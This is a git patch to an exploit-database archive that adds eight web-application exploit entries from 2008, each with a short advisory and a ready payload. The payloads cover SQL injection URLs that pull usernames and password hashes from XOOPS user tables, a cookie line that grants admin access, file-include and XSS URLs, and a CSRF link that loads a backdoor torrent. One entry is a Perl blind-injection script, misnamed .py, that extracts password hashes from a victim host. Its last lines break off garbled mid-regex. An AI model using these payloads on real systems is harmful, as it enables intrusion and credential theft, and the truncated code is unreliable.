From 681c155d4f3f6fff395872754bf1dfaca06f5411 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 17 Feb 2014 04:27:42 +0000 Subject: [PATCH] Updated 02_17_2014 --- files.csv | 8 +++ platforms/multiple/webapps/31673.txt | 9 ++++ platforms/php/webapps/31674.txt | 11 ++++ platforms/php/webapps/31675.txt | 10 ++++ platforms/php/webapps/31676.txt | 7 +++ platforms/php/webapps/31677.txt | 11 ++++ platforms/php/webapps/31679.txt | 10 ++++ platforms/php/webapps/31681.py | 78 ++++++++++++++++++++++++++++ platforms/php/webapps/31682.txt | 11 ++++ 9 files changed, 155 insertions(+) create mode 100755 platforms/multiple/webapps/31673.txt create mode 100755 platforms/php/webapps/31674.txt create mode 100755 platforms/php/webapps/31675.txt create mode 100755 platforms/php/webapps/31676.txt create mode 100755 platforms/php/webapps/31677.txt create mode 100755 platforms/php/webapps/31679.txt create mode 100755 platforms/php/webapps/31681.py create mode 100755 platforms/php/webapps/31682.txt diff --git a/files.csv b/files.csv index 7410c5d88..1d974c5db 100755 --- a/files.csv +++ b/files.csv @@ -28453,3 +28453,11 @@ id,file,description,date,author,platform,type,port 31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 admin.php Administrator Account Creation CSRF",2008-04-18,"Michael Brooks",php,webapps,0 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 beta 2 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,php,webapps,0 +31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 Cross-Site Request Forgery Vulnerability",2008-04-18,th3.r00k,multiple,webapps,0 +31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 'detail.php' SQL Injection Vulnerability",2008-04-19,S@BUN,php,webapps,0 +31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 Multiple Local File Include Vulnerabilities",2008-04-19,KnocKout,php,webapps,0 +31676,platforms/php/webapps/31676.txt,"Host Directory PRO Cookie Security Bypass Vulnerability",2008-04-20,Crackers_Child,php,webapps,0 +31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 'beg' Parameter Cross Site Scripting Vulnerability",2008-04-21,ZoRLu,php,webapps,0 +31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0 +31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0 +31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0 diff --git a/platforms/multiple/webapps/31673.txt b/platforms/multiple/webapps/31673.txt new file mode 100755 index 000000000..abefe7c0d --- /dev/null +++ b/platforms/multiple/webapps/31673.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28848/info + +Azureus HTML WebUI is prone to a cross-site request-forgery vulnerability. + +Successful exploits aid in transferring malicious content to unsuspecting users' computers, aiding in further attacks. Other actions may also be affected, but this has not been confirmed. + +Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected. + +http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent \ No newline at end of file diff --git a/platforms/php/webapps/31674.txt b/platforms/php/webapps/31674.txt new file mode 100755 index 000000000..37917d2d5 --- /dev/null +++ b/platforms/php/webapps/31674.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28859/info + +XOOPS Recette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Recette 2.2 is vulnerable to this issue; other versions may also be affected. + +http://www.example.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/* + + diff --git a/platforms/php/webapps/31675.txt b/platforms/php/webapps/31675.txt new file mode 100755 index 000000000..53f9f5769 --- /dev/null +++ b/platforms/php/webapps/31675.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28861/info + +Aterr is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks. + +The issues affect Aterr 0.9.1; other versions might also be affected. + +http://www.example.com/path/include/functions.inc.php?class=[Local File] +http://www.example.com/path/include/common.inc.php?file=[Local File] \ No newline at end of file diff --git a/platforms/php/webapps/31676.txt b/platforms/php/webapps/31676.txt new file mode 100755 index 000000000..050a66000 --- /dev/null +++ b/platforms/php/webapps/31676.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28863/info + +Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions. + +Exploiting this issue may allow an attacker to bypass certain security restrictions and gain administrative access to the application. This will compromise the application and may aid in further attacks. + +javascript:document.cookie = "adm=1 path=/;"; \ No newline at end of file diff --git a/platforms/php/webapps/31677.txt b/platforms/php/webapps/31677.txt new file mode 100755 index 000000000..ea639605a --- /dev/null +++ b/platforms/php/webapps/31677.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28865/info + +Advanced Electron Forum (AEF) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Advanced Electron Forum (AEF) 1.0.6 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?act=members&sortby=1&order=1&beg=[XSS] + + diff --git a/platforms/php/webapps/31679.txt b/platforms/php/webapps/31679.txt new file mode 100755 index 000000000..9ff68b275 --- /dev/null +++ b/platforms/php/webapps/31679.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28867/info + +PortailPHP is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible. + +PortailPHP 2.0 is vulnerable; other versions may also be vulnerable. + + +http://www.example.com/portailphp_path/mod_search/index.php?chemin=ZoRlu.txt \ No newline at end of file diff --git a/platforms/php/webapps/31681.py b/platforms/php/webapps/31681.py new file mode 100755 index 000000000..a4b517b5f --- /dev/null +++ b/platforms/php/webapps/31681.py @@ -0,0 +1,78 @@ +source: http://www.securityfocus.com/bid/28879/info + + +XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +# Exploit : + +############################################# + +#Coded By Cr@zy_King http://coderx.org]# + +############################################# + +use IO::Socket; + +if (@ARGV != 3) + +{ + +print "\n-----------------------------------\n"; + +print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n"; + +print "-----------------------------------\n"; + +print "\n4ever Cra\n"; + +print "crazy_kinq[at]hotmail.co.uk\n"; + +print "http://coderx.org\n"; + +print "\n-----------------------------------\n"; + +print "\nKullanim: $0 \n"; + +print "Ornek: $0 www.victim.com /path 1\n"; + +print "\n-----------------------------------\n"; + +exit (); + +} + +$server = $ARGV[0]; + +$path = $ARGV[1]; + +$uid = $ARGV[2]; + +$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => + +"80"); + +printf $socket ("GET + +%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NUL +L,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, +NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: + +close\n\n", + +$path,$server,$uid); + +while(<$socket>) + +{ + +if (/\>(\w{32})\' http://someblog.com/ \ No newline at end of file